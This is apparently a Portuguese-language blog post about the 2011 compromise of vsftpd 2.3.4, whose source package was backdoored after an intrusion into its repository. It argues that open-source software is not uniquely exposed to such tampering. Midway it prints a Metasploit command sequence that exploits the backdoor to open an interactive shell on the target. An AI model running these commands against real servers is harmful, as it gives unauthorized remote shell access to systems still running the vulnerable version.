A existência de backdoor em programas não é mais nenhuma novidade. Quem nunca ouviu falar nas backdoors existentes em equipamentos de redes e em alguns sistemas operacionais Linux ?

A bola da vez foi o VSFTPD, um dos aplicativos para FTP servers mais instalados e utilizados por administradores Linux em todo o mundo, acho que só perde para o proftpd. A versão afetada é a vsftpd-2.3.4 de 2011-06-30.

Evans, criador do VSFTPD informou a comunidade que essa versão foi comprometida depois que algum cracker conseguiu invadir o repositório do VSFTPD e subiu um malware junto com o pacote.

Rolou até um vídeo demonstrando, passo a passo, a exploração deste backdoor via Metasploit:

A sintaxe do metasploit para realizar a demonstração é essa aqui:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

Já tem um monte de site e blogs falando que esse é um dos principais problemas do opensource, a sua vulnerabilidade quanto a ataques para inclusão de backdoor. Ledo egano. Qualquer software está sujeito a isso.

E olhem que demorou pouco tempo até a divulgação do problema, dia 03 de Julho foi quando o VSFTPD foi liberado com o backdoor e galera reportou o problema no dia seguinte. Não é a mesma coisa que acontece com outros softwares. Pena.

Compartilhar:

Deixe uma resposta

Fechar Menu